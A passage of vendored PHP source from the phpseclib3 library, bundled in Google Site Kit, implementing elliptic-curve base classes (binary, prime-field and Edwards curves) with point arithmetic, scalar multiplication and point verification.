coordinates for the base point */ public function setBasePoint($x, $y) { switch (\true) { case !$x instanceof \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger && !$x instanceof \Google\Site_Kit_Dependencies\phpseclib3\Math\PrimeField\Integer: throw new \UnexpectedValueException('Google\\Site_Kit_Dependencies\\Argument 1 passed to Prime::setBasePoint() must be an instance of either BigInteger or PrimeField\\Integer'); case !$y instanceof \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger && !$y instanceof \Google\Site_Kit_Dependencies\phpseclib3\Math\PrimeField\Integer: throw new \UnexpectedValueException('Google\\Site_Kit_Dependencies\\Argument 2 passed to Prime::setBasePoint() must be an instance of either BigInteger or PrimeField\\Integer'); } if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } $this->p = [$x instanceof \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger ? $this->factory->newInteger($x) : $x, $y instanceof \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger ? $this->factory->newInteger($y) : $y]; } /** * Returns the a coefficient * * @return PrimeInteger */ public function getA() { return $this->a; } /** * Returns the a coefficient * * @return PrimeInteger */ public function getD() { return $this->d; } /** * Retrieve the base point as an array * * @return array */ public function getBasePoint() { if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } /* if (!isset($this->p)) { throw new \RuntimeException('setBasePoint needs to be called before this method'); } */ return $this->p; } /** * Returns the affine point * * @return PrimeField\Integer[] */ public function convertToAffine(array $p) { if (!isset($p[2])) { return $p; } list($x, $y, $z) = $p; $z = $this->one->divide($z); return [$x->multiply($z), $y->multiply($z)]; } /** * Returns the modulo * * @return BigInteger */ public function getModulo() { return $this->modulo; } /** * Tests whether or not the x / y values satisfy the equation * * @return boolean */ public function verifyPoint(array $p) { list($x, $y) = $p; $x2 = $x->multiply($x); $y2 = $y->multiply($y); $lhs = $this->a->multiply($x2)->add($y2); $rhs = $this->d->multiply($x2)->multiply($y2)->add($this->one); return $lhs->equals($rhs); } } <?php /** * Curve methods common to all curves * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * Base * * @author Jim Wigginton <terrafrost@php.net> */ abstract class Base { /** * The Order * * @var BigInteger */ protected $order; /** * Finite Field Integer factory * * @var FiniteField\Integer */ protected $factory; /** * Returns a random integer * * @return object */ public function randomInteger() { return $this->factory->randomInteger(); } /** * Converts a BigInteger to a FiniteField\Integer integer * * @return object */ public function convertInteger(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $x) { return $this->factory->newInteger($x); } /** * Returns the length, in bytes, of the modulo * * @return integer */ public function getLengthInBytes() { return $this->factory->getLengthInBytes(); } /** * Returns the length, in bits, of the modulo * * @return integer */ public function getLength() { return $this->factory->getLength(); } /** * Multiply a point on the curve by a scalar * * Uses the montgomery ladder technique as described here: * * https://en.wikipedia.org/wiki/Elliptic_curve_point_multiplication#Montgomery_ladder * https://github.com/phpecc/phpecc/issues/16#issuecomment-59176772 * * @return array */ public function multiplyPoint(array $p, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $d) { $alreadyInternal = isset($p[2]); $r = $alreadyInternal ? [[], $p] : [[], $this->convertToInternal($p)]; $d = $d->toBits(); for ($i = 0; $i < \strlen($d); $i++) { $d_i = (int) $d[$i]; $r[1 - $d_i] = $this->addPoint($r[0], $r[1]); $r[$d_i] = $this->doublePoint($r[$d_i]); } return $alreadyInternal ? $r[0] : $this->convertToAffine($r[0]); } /** * Creates a random scalar multiplier * * @return BigInteger */ public function createRandomMultiplier() { static $one; if (!isset($one)) { $one = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(1); } return \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger::randomRange($one, $this->order->subtract($one)); } /** * Performs range check */ public function rangeCheck(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $x) { static $zero; if (!isset($zero)) { $zero = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(); } if (!isset($this->order)) { throw new \RuntimeException('setOrder needs to be called before this method'); } if ($x->compare($this->order) > 0 || $x->compare($zero) <= 0) { throw new \RangeException('x must be between 1 and the order of the curve'); } } /** * Sets the Order */ public function setOrder(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $order) { $this->order = $order; } /** * Returns the Order * * @return BigInteger */ public function getOrder() { return $this->order; } /** * Use a custom defined modular reduction function * * @return object */ public function setReduction(callable $func) { $this->factory->setReduction($func); } /** * Returns the affine point * * @return object[] */ public function convertToAffine(array $p) { return $p; } /** * Converts an affine point to a jacobian coordinate * * @return object[] */ public function convertToInternal(array $p) { return $p; } /** * Negates a point * * @return object[] */ public function negatePoint(array $p) { $temp = [$p[0], $p[1]->negate()]; if (isset($p[2])) { $temp[] = $p[2]; } return $temp; } /** * Multiply and Add Points * * @return int[] */ public function multiplyAddPoints(array $points, array $scalars) { $p1 = $this->convertToInternal($points[0]); $p2 = $this->convertToInternal($points[1]); $p1 = $this->multiplyPoint($p1, $scalars[0]); $p2 = $this->multiplyPoint($p2, $scalars[1]); $r = $this->addPoint($p1, $p2); return $this->convertToAffine($r); } } <?php /** * Curves over y^2 + x*y = x^3 + a*x^2 + b * * These are curves used in SEC 2 over prime fields: http://www.secg.org/SEC2-Ver-1.0.pdf * The curve is a weierstrass curve with a[3] and a[2] set to 0. * * Uses Jacobian Coordinates for speed if able: * * https://en.wikipedia.org/wiki/Jacobian_curve * https://en.wikibooks.org/wiki/Cryptography/Prime_Curve/Jacobian_Coordinates * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; use Google\Site_Kit_Dependencies\phpseclib3\Math\BinaryField; use Google\Site_Kit_Dependencies\phpseclib3\Math\BinaryField\Integer as BinaryInteger; /** * Curves over y^2 + x*y = x^3 + a*x^2 + b * * @author Jim Wigginton <terrafrost@php.net> */ class Binary extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Base { /** * Binary Field Integer factory * * @var BinaryField */ protected $factory; /** * Cofficient for x^1 * * @var object */ protected $a; /** * Cofficient for x^0 * * @var object */ protected $b; /** * Base Point * * @var object */ protected $p; /** * The number one over the specified finite field * * @var object */ protected $one; /** * The modulo * * @var BigInteger */ protected $modulo; /** * The Order * * @var BigInteger */ protected $order; /** * Sets the modulo */ public function setModulo(...$modulo) { $this->modulo = $modulo; $this->factory = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BinaryField(...$modulo); $this->one = $this->factory->newInteger("\x01"); } /** * Set coefficients a and b * * @param string $a * @param string $b */ public function setCoefficients($a, $b) { if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } $this->a = $this->factory->newInteger(\pack('H*', $a)); $this->b = $this->factory->newInteger(\pack('H*', $b)); } /** * Set x and y coordinates for the base point * * @param string|BinaryInteger $x * @param string|BinaryInteger $y */ public function setBasePoint($x, $y) { switch (\true) { case !\is_string($x) && !$x instanceof \Google\Site_Kit_Dependencies\phpseclib3\Math\BinaryField\Integer: throw new \UnexpectedValueException('Google\\Site_Kit_Dependencies\\Argument 1 passed to Binary::setBasePoint() must be a string or an instance of BinaryField\\Integer'); case !\is_string($y) && !$y instanceof \Google\Site_Kit_Dependencies\phpseclib3\Math\BinaryField\Integer: throw new \UnexpectedValueException('Google\\Site_Kit_Dependencies\\Argument 2 passed to Binary::setBasePoint() must be a string or an instance of BinaryField\\Integer'); } if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } $this->p = [\is_string($x) ? $this->factory->newInteger(\pack('H*', $x)) : $x, \is_string($y) ? $this->factory->newInteger(\pack('H*', $y)) : $y]; } /** * Retrieve the base point as an array * * @return array */ public function getBasePoint() { if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } /* if (!isset($this->p)) { throw new \RuntimeException('setBasePoint needs to be called before this method'); } */ return $this->p; } /** * Adds two points on the curve * * @return FiniteField[] */ public function addPoint(array $p, array $q) { if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } if (!\count($p) || !\count($q)) { if (\count($q)) { return $q; } if (\count($p)) { return $p; } return []; } if (!isset($p[2]) || !isset($q[2])) { throw new \RuntimeException('Affine coordinates need to be manually converted to "Jacobi" coordinates or vice versa'); } if ($p[0]->equals($q[0])) { return !$p[1]->equals($q[1]) ? [] : $this->doublePoint($p); } // formulas from http://hyperelliptic.org/EFD/g12o/auto-shortw-jacobian.html list($x1, $y1, $z1) = $p; list($x2, $y2, $z2) = $q; $o1 = $z1->multiply($z1); $b = $x2->multiply($o1); if ($z2->equals($this->one)) { $d = $y2->multiply($o1)->multiply($z1); $e = $x1->add($b); $f = $y1->add($d); $z3 = $e->multiply($z1); $h = $f->multiply($x2)->add($z3->multiply($y2)); $i = $f->add($z3); $g = $z3->multiply($z3); $p1 = $this->a->multiply($g); $p2 = $f->multiply($i); $p3 = $e->multiply($e)->multiply($e); $x3 = $p1->add($p2)->add($p3); $y3 = $i->multiply($x3)->add($g->multiply($h)); return [$x3, $y3, $z3]; } $o2 = $z2->multiply($z2); $a = $x1->multiply($o2); $c = $y1->multiply($o2)->multiply($z2); $d = $y2->multiply($o1)->multiply($z1); $e = $a->add($b); $f = $c->add($d); $g = $e->multiply($z1); $h = $f->multiply($x2)->add($g->multiply($y2)); $z3 = $g->multiply($z2); $i = $f->add($z3); $p1 = $this->a->multiply($z3->multiply($z3)); $p2 = $f->multiply($i); $p3 = $e->multiply($e)->multiply($e); $x3 = $p1->add($p2)->add($p3); $y3 = $i->multiply($x3)->add($g->multiply($g)->multiply($h)); return [$x3, $y3, $z3]; } /** * Doubles a point on a curve * * @return FiniteField[] */ public function doublePoint(array $p) { if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } if (!\count($p)) { return []; } if (!isset($p[2])) { throw new \RuntimeException('Affine coordinates need to be manually converted to "Jacobi" coordinates or vice versa'); } // formulas from http://hyperelliptic.org/EFD/g12o/auto-shortw-jacobian.html list($x1, $y1, $z1) = $p; $a = $x1->multiply($x1); $b = $a->multiply($a); if ($z1->equals($this->one)) { $x3 = $b->add($this->b); $z3 = clone $x1; $p1 = $a->add($y1)->add($z3)->multiply($this->b); $p2 = $a->add($y1)->multiply($b); $y3 = $p1->add($p2); return [$x3, $y3, $z3]; } $c = $z1->multiply($z1); $d = $c->multiply($c); $x3 = $b->add($this->b->multiply($d->multiply($d))); $z3 = $x1->multiply($c); $p1 = $b->multiply($z3); $p2 = $a->add($y1->multiply($z1))->add($z3)->multiply($x3); $y3 = $p1->add($p2); return [$x3, $y3, $z3]; } /** * Returns the X coordinate and the derived Y coordinate * * Not supported because it is covered by patents. * Quoting https://www.openssl.org/docs/man1.1.0/apps/ecparam.html , * * "Due to patent issues the compressed option is disabled by default for binary curves * and can be enabled by defining the preprocessor macro OPENSSL_EC_BIN_PT_COMP at * compile time." * * @return array */ public function derivePoint($m) { throw new \RuntimeException('Point compression on binary finite field elliptic curves is not supported'); } /** * Tests whether or not the x / y values satisfy the equation * * @return boolean */ public function verifyPoint(array $p) { list($x, $y) = $p; $lhs = $y->multiply($y); $lhs = $lhs->add($x->multiply($y)); $x2 = $x->multiply($x); $x3 = $x2->multiply($x); $rhs = $x3->add($this->a->multiply($x2))->add($this->b); return $lhs->equals($rhs); } /** * Returns the modulo * * @return BigInteger */ public function getModulo() { return $this->modulo; } /** * Returns the a coefficient * * @return \phpseclib3\Math\PrimeField\Integer */ public function getA() { return $this->a; } /** * Returns the a coefficient * * @return \phpseclib3\Math\PrimeField\Integer */ public function getB() { return $this->b; } /** * Returns the affine point * * A Jacobian Coordinate is of the form (x, y, z). * To convert a Jacobian Coordinate to an Affine Point * you do (x / z^2, y / z^3) * * @return \phpseclib3\Math\PrimeField\Integer[] */ public function convertToAffine(array $p) { if (!isset($p[2])) { return $p; } list($x, $y, $z) = $p; $z = $this->one->divide($z); $z2 = $z->multiply($z); return [$x->multiply($z2), $y->multiply($z2)->multiply($z)]; } /** * Converts an affine point to a jacobian coordinate * * @return \phpseclib3\Math\PrimeField\Integer[] */ public function convertToInternal(array $p) { if (isset($p[2])) { return $p; } $p[2] = clone $this->one; $p['fresh'] = \true; return $p; } } <?php /** * Curves over y^2 = x^3 + a*x + b * * These are curves used in SEC 2 over prime fields: http://www.secg.org/SEC2-Ver-1.0.pdf * The curve is a weierstrass curve with a[1], a[3] and a[2] set to 0. * * Uses Jacobian Coordinates for speed if able: * * https://en.wikipedia.org/wiki/Jacobian_curve * https://en.wikibooks.org/wiki/Cryptography/Prime_Curve/Jacobian_Coordinates * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; use Google\Site_Kit_Dependencies\phpseclib3\Math\Common\FiniteField\Integer; use Google\Site_Kit_Dependencies\phpseclib3\Math\PrimeField; use Google\Site_Kit_Dependencies\phpseclib3\Math\PrimeField\Integer as PrimeInteger; /** * Curves over y^2 = x^3 + a*x + b * * @author Jim Wigginton <terrafrost@php.net> */ class Prime extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Base { /** * Prime Field Integer factory * * @var \phpseclib3\Math\PrimeFields */ protected $factory; /** * Cofficient for x^1 * * @var object */ protected $a; /** * Cofficient for x^0 * * @var object */ protected $b; /** * Base Point * * @var object */ protected $p; /** * The number one over the specified finite field * * @var object */ protected $one; /** * The number two over the specified finite field * * @var object */ protected $two; /** * The number three over the specified finite field * * @var object */ protected $three; /** * The number four over the specified finite field * * @var object */ protected $four; /** * The number eight over the specified finite field * * @var object */ protected $eight; /** * The modulo * * @var BigInteger */ protected $modulo; /** * The Order * * @var BigInteger */ protected $order; /** * Sets the modulo */ public function setModulo(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $modulo) { $this->modulo = $modulo; $this->factory = new \Google\Site_Kit_Dependencies\phpseclib3\Math\PrimeField($modulo); $this->two = $this->factory->newInteger(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(2)); $this->three = $this->factory->newInteger(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(3)); // used by jacobian coordinates $this->one = $this->factory->newInteger(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(1)); $this->four = $this->factory->newInteger(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(4)); $this->eight = $this->factory->newInteger(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(8)); } /** * Set coefficients a and b */ public function setCoefficients(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $a, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $b) { if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } $this->a = $this->factory->newInteger($a); $this->b = $this->factory->newInteger($b); } /** * Set x and y coordinates for the base point * * @param BigInteger|PrimeInteger $x * @param BigInteger|PrimeInteger $y * @return PrimeInteger[] */ public function setBasePoint($x, $y) { switch (\true) { case !$x instanceof \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger && !$x instanceof \Google\Site_Kit_Dependencies\phpseclib3\Math\PrimeField\Integer: throw new \UnexpectedValueException('Google\\Site_Kit_Dependencies\\Argument 1 passed to Prime::setBasePoint() must be an instance of either BigInteger or PrimeField\\Integer'); case !$y instanceof \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger && !$y instanceof \Google\Site_Kit_Dependencies\phpseclib3\Math\PrimeField\Integer: throw new \UnexpectedValueException('Google\\Site_Kit_Dependencies\\Argument 2 passed to Prime::setBasePoint() must be an instance of either BigInteger or PrimeField\\Integer'); } if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } $this->p = [$x instanceof \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger ? $this->factory->newInteger($x) : $x, $y instanceof \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger ? $this->factory->newInteger($y) : $y]; } /** * Retrieve the base point as an array * * @return array */ public function getBasePoint() { if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } /* if (!isset($this->p)) { throw new \RuntimeException('setBasePoint needs to be called before this method'); } */ return $this->p; } /** * Adds two "fresh" jacobian form on the curve * * @return FiniteField[] */ protected function jacobianAddPointMixedXY(array $p, array $q) { list($u1, $s1) = $p; list($u2, $s2) = $q; if ($u1->equals($u2)) { if (!$s1->equals($s2)) { return []; } else { return $this->doublePoint($p); } } $h = $u2->subtract($u1); $r = $s2->subtract($s1); $h2 = $h->multiply($h); $h3 = $h2->multiply($h); $v = $u1->multiply($h2); $x3 = $r->multiply($r)->subtract($h3)->subtract($v->multiply($this->two)); $y3 = $r->multiply($v->subtract($x3))->subtract($s1->multiply($h3)); return [$x3, $y3, $h]; } /** * Adds one "fresh" jacobian form on the curve * * The second parameter should be the "fresh" one * * @return FiniteField[] */ protected function jacobianAddPointMixedX(array $p, array $q) { list($u1, $s1, $z1) = $p; list($x2, $y2) = $q; $z12 = $z1->multiply($z1); $u2 = $x2->multiply($z12); $s2 = $y2->multiply($z12->multiply($z1)); if ($u1->equals($u2)) { if (!$s1->equals($s2)) { return []; } else { return $this->doublePoint($p); } } $h = $u2->subtract($u1); $r = $s2->subtract($s1); $h2 = $h->multiply($h); $h3 = $h2->multiply($h); $v = $u1->multiply($h2); $x3 = $r->multiply($r)->subtract($h3)->subtract($v->multiply($this->two)); $y3 = $r->multiply($v->subtract($x3))->subtract($s1->multiply($h3)); $z3 = $h->multiply($z1); return [$x3, $y3, $z3]; } /** * Adds two jacobian coordinates on the curve * * @return FiniteField[] */ protected function jacobianAddPoint(array $p, array $q) { list($x1, $y1, $z1) = $p; list($x2, $y2, $z2) = $q; $z12 = $z1->multiply($z1); $z22 = $z2->multiply($z2); $u1 = $x1->multiply($z22); $u2 = $x2->multiply($z12); $s1 = $y1->multiply($z22->multiply($z2)); $s2 = $y2->multiply($z12->multiply($z1)); if ($u1->equals($u2)) { if (!$s1->equals($s2)) { return []; } else { return $this->doublePoint($p); } } $h = $u2->subtract($u1); $r = $s2->subtract($s1); $h2 = $h->multiply($h); $h3 = $h2->multiply($h); $v = $u1->multiply($h2); $x3 = $r->multiply($r)->subtract($h3)->subtract($v->multiply($this->two)); $y3 = $r->multiply($v->subtract($x3))->subtract($s1->multiply($h3)); $z3 = $h->multiply($z1)->multiply($z2); return [$x3, $y3, $z3]; } /** * Adds two points on the curve * * @return FiniteField[] */ public function addPoint(array $p, array $q) { if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } if (!\count($p) || !\count($q)) { if (\count($q)) { return $q; } if (\count($p)) { return $p; } return []; } // use jacobian coordinates if (isset($p[2]) && isset($q[2])) { if (isset($p['fresh']) && isset($q['fresh'])) { return $this->jacobianAddPointMixedXY($p, $q); } if (isset($p['fresh'])) { return $this->jacobianAddPointMixedX($q, $p); } if (isset($q['fresh'])) { return $this->jacobianAddPointMixedX($p, $q); } return $this->jacobianAddPoint($p, $q); } if (isset($p[2]) || isset($q[2])) { throw new \RuntimeException('Affine coordinates need to be manually converted to Jacobi coordinates or vice versa'); } if ($p[0]->equals($q[0])) { if (!$p[1]->equals($q[1])) { return []; } else { // eg. doublePoint list($numerator, $denominator) = $this->doublePointHelper($p); } } else { $numerator = $q[1]->subtract($p[1]); $denominator = $q[0]->subtract($p[0]); } $slope = $numerator->divide($denominator); $x = $slope->multiply($slope)->subtract($p[0])->subtract($q[0]); $y = $slope->multiply($p[0]->subtract($x))->subtract($p[1]); return [$x, $y]; } /** * Returns the numerator and denominator of the slope * * @return FiniteField[] */ protected function doublePointHelper(array $p) { $numerator = $this->three->multiply($p[0])->multiply($p[0])->add($this->a); $denominator = $this->two->multiply($p[1]); return [$numerator, $denominator]; } /** * Doubles a jacobian coordinate on the curve * * @return FiniteField[] */ protected function jacobianDoublePoint(array $p) { list($x, $y, $z) = $p; $x2 = $x->multiply($x); $y2 = $y->multiply($y); $z2 = $z->multiply($z); $s = $this->four->multiply($x)->multiply($y2); $m1 = $this->three->multiply($x2); $m2 = $this->a->multiply($z2->multiply($z2)); $m = $m1->add($m2); $x1 = $m->multiply($m)->subtract($this->two->multiply($s)); $y1 = $m->multiply($s->subtract($x1))->subtract($this->eight->multiply($y2->multiply($y2))); $z1 = $this->two->multiply($y)->multiply($z); return [$x1, $y1, $z1]; } /** * Doubles a "fresh" jacobian coordinate on the curve * * @return FiniteField[] */ protected function jacobianDoublePointMixed(array $p) { list($x, $y) = $p; $x2 = $x->multiply($x); $y2 = $y->multiply($y); $s = $this->four->multiply($x)->multiply($y2); $m1 = $this->three->multiply($x2); $m = $m1->add($this->a); $x1 = $m->multiply($m)->subtract($this->two->multiply($s)); $y1 = $m->multiply($s->subtract($x1))->subtract($this->eight->multiply($y2->multiply($y2))); $z1 = $this->two->multiply($y); return [$x1, $y1, $z1]; } /** * Doubles a point on a curve * * @return FiniteField[] */ public function doublePoint(array $p) { if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } if (!\count($p)) { return []; } // use jacobian coordinates if (isset($p[2])) { if (isset($p['fresh'])) { return $this->jacobianDoublePointMixed($p); } return $this->jacobianDoublePoint($p); } list($numerator, $denominator) = $this->doublePointHelper($p); $slope = $numerator->divide($denominator); $x = $slope->multiply($slope)->subtract($p[0])->subtract($p[0]); $y = $slope->multiply($p[0]->subtract($x))->subtract($p[1]); return [$x, $y]; } /** * Returns the X coordinate and the derived Y coordinate * * @return array */ public function derivePoint($m) { $y = \ord(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($m)); $x = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($m, 256); $xp = $this->convertInteger($x); switch ($y) { case 2: $ypn = \false; break; case 3: $ypn = \true; break; default: throw new \RuntimeException('Coordinate not in recognized format'); } $temp = $xp->multiply($this->a); $temp = $xp->multiply($xp)->multiply($xp)->add($temp); $temp = $temp->add($this->b); $b = $temp->squareRoot(); if (!$b) { throw new \RuntimeException('Unable to derive Y coordinate'); } $bn = $b->isOdd(); $yp = $ypn == $bn ? $b : $b->negate(); return [$xp, $yp]; } /** * Tests whether or not the x / y values satisfy the equation * * @return boolean */ public function verifyPoint(array $p) { list($x, $y) = $p; $lhs = $y->multiply($y); $temp = $x->multiply($this->a); $temp = $x->multiply($x)->multiply($x)->add($temp); $rhs = $temp->add($this->b); return $lhs->equals($rhs); } /** * Returns the modulo * * @return BigInteger */ public function getModulo() { return $this->modulo; } /** * Returns the a coefficient * * @return PrimeInteger */ public function getA() { return $this->a; } /** * Returns the a coefficient * * @return PrimeInteger */ public function getB() { return $this->b; } /** * Multiply and Add Points * * Adapted from: * https://github.com/indutny/elliptic/blob/725bd91/lib/elliptic/curve/base.js#L125 * * @return int[] */ public function multiplyAddPoints(array $points, array $scalars) { $length = \count($points); foreach ($points as &$point) { $point = $this->convertToInternal($point); } $wnd = [$this->getNAFPoints($points[0], 7)]; $wndWidth = [isset($points[0]['nafwidth']) ? $points[0]['nafwidth'] : 7]; for ($i = 1; $i < $length; $i++) { $wnd[] = $this->getNAFPoints($points[$i], 1); $wndWidth[] = isset($points[$i]['nafwidth']) ? $points[$i]['nafwidth'] : 1; } $naf = []; // comb all window NAFs $max = 0; for ($i = $length - 1; $i >= 1; $i -= 2) { $a = $i - 1; $b = $i; if ($wndWidth[$a] != 1 || $wndWidth[$b] != 1) { $naf[$a] = $scalars[$a]->getNAF($wndWidth[$a]); $naf[$b] = $scalars[$b]->getNAF($wndWidth[$b]); $max = \max(\count($naf[$a]), \count($naf[$b]), $max); continue; } $comb = [ $points[$a], // 1 null, // 3 null, // 5 $points[$b], ]; $comb[1] = $this->addPoint($points[$a], $points[$b]); $comb[2] = $this->addPoint($points[$a], $this->negatePoint($points[$b])); $index = [ -3, /* -1 -1 */ -1, /* -1 0 */ -5, /* -1 1 */ -7, /* 0 -1 */ 0, /* 0 -1 */ 7, /* 0 1 */ 5, /* 1 -1 */ 1, /* 1 0 */ 3, ]; $jsf = self::getJSFPoints($scalars[$a], $scalars[$b]); $max = \max(\count($jsf[0]), $max); if ($max > 0) { $naf[$a] = \array_fill(0, $max, 0); $naf[$b] = \array_fill(0, $max, 0); } else { $naf[$a] = []; $naf[$b] = []; } for ($j = 0; $j < $max; $j++) { $ja = isset($jsf[0][$j]) ? $jsf[0][$j] : 0; $jb = isset($jsf[1][$j]) ? $jsf[1][$j] : 0; $naf[$a][$j] = $index[3 * ($ja + 1) + $jb + 1]; $naf[$b][$j] = 0; $wnd[$a] = $comb; } } $acc = []; $temp = [0, 0, 0, 0]; for ($i = $max; $i >= 0; $i--) { $k = 0; while ($i >= 0) { $zero = \true; for ($j = 0; $j < $length; $j++) { $temp[$j] = isset($naf[$j][$i]) ? $naf[$j][$i] : 0; if ($temp[$j] != 0) { $zero = \false; } } if (!$zero) { break; } $k++; $i--; } if ($i >= 0) { $k++; } while ($k--) { $acc = $this->doublePoint($acc); } if ($i < 0) { break; } for ($j = 0; $j < $length; $j++) { $z = $temp[$j]; $p = null; if ($z == 0) { continue; } $p = $z > 0 ? $wnd[$j][$z - 1 >> 1] : $this->negatePoint($wnd[$j][-$z - 1 >> 1]); $acc = $this->addPoint($acc, $p); } } return $this->convertToAffine($acc); } /** * Precomputes NAF points * * Adapted from: * https://github.com/indutny/elliptic/blob/725bd91/lib/elliptic/curve/base.js#L351 * * @return int[] */ private function getNAFPoints(array $point, $wnd) { if (isset($point['naf'])) { return $point['naf']; } $res = [$point]; $max = (1 << $wnd) - 1; $dbl = $max == 1 ? null : $this->doublePoint($point); for ($i = 1; $i < $max; $i++) { $res[] = $this->addPoint($res[$i - 1], $dbl); } $point['naf'] = $res; /* $str = ''; foreach ($res as $re) { $re[0] = bin2hex($re[0]->toBytes()); $re[1] = bin2hex($re[1]->toBytes()); $str.= " ['$re[0]', '$re[1]'],\r\n"; } file_put_contents('temp.txt', $str); exit; */ return $res; } /** * Precomputes points in Joint Sparse Form * * Adapted from: * https://github.com/indutny/elliptic/blob/725bd91/lib/elliptic/utils.js#L96 * * @return int[] */ private static function getJSFPoints(\Google\Site_Kit_Dependencies\phpseclib3\Math\Common\FiniteField\Integer $k1, \Google\Site_Kit_Dependencies\phpseclib3\Math\Common\FiniteField\Integer $k2) { static $three; if (!isset($three)) { $three = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(3); } $jsf = [[], []]; $k1 = $k1->toBigInteger(); $k2 = $k2->toBigInteger(); $d1 = 0; $d2 = 0; while ($k1->compare(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(-$d1)) > 0 || $k2->compare(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(-$d2)) > 0) { // first phase $m14 = $k1->testBit(0) + 2 * $k1->testBit(1); $m14 += $d1; $m14 &= 3; $m24 = $k2->testBit(0) + 2 * $k2->testBit(1); $m24 += $d2; $m24 &= 3; if ($m14 == 3) { $m14 = -1; } if ($m24 == 3) { $m24 = -1; } $u1 = 0; if ($m14 & 1) { // if $m14 is odd $m8 = $k1->testBit(0) + 2 * $k1->testBit(1) + 4 * $k1->testBit(2); $m8 += $d1; $m8 &= 7; $u1 = ($m8 == 3 || $m8 == 5) && $m24 == 2 ? -$m14 : $m14; } $jsf[0][] = $u1; $u2 = 0; if ($m24 & 1) { // if $m24 is odd $m8 = $k2->testBit(0) + 2 * $k2->testBit(1) + 4 * $k2->testBit(2); $m8 += $d2; $m8 &= 7; $u2 = ($m8 == 3 || $m8 == 5) && $m14 == 2 ? -$m24 : $m24; } $jsf[1][] = $u2; // second phase if (2 * $d1 == $u1 + 1) { $d1 = 1 - $d1; } if (2 * $d2 == $u2 + 1) { $d2 = 1 - $d2; } $k1 = $k1->bitwise_rightShift(1); $k2 = $k2->bitwise_rightShift(1); } return $jsf; } /** * Returns the affine point * * A Jacobian Coordinate is of the form (x, y, z). * To convert a Jacobian Coordinate to an Affine Point * you do (x / z^2, y / z^3) * * @return \phpseclib3\Math\PrimeField\Integer[] */ public function convertToAffine(array $p) { if (!isset($p[2])) { return $p; } list($x, $y, $z) = $p; $z = $this->one->divide($z); $z2 = $z->multiply($z); return [$x->multiply($z2), $y->multiply($z2)->multiply($z)]; } /** * Converts an affine point to a jacobian coordinate * * @return \phpseclib3\Math\PrimeField\Integer[] */ public function convertToInternal(array $p) { if (isset($p[2])) { return $p; } $p[2] = clone $this->one; $p['fresh'] = \true; return $p; } } <?php /** * Curves over y^2 = x^3 + a*x + x * * Technically, a Montgomery curve has a coefficient for y^2 but for Curve25519 and Curve448 that * coefficient is 1. * * Curve25519 and Curve448 do not make use of the y coordinate, which makes it unsuitable for use * with ECDSA / EdDSA. A few other differences between Curve25519 and Ed25519 are discussed at * https://crypto.stackexchange.com/a/43058/4520 * * More info: * * 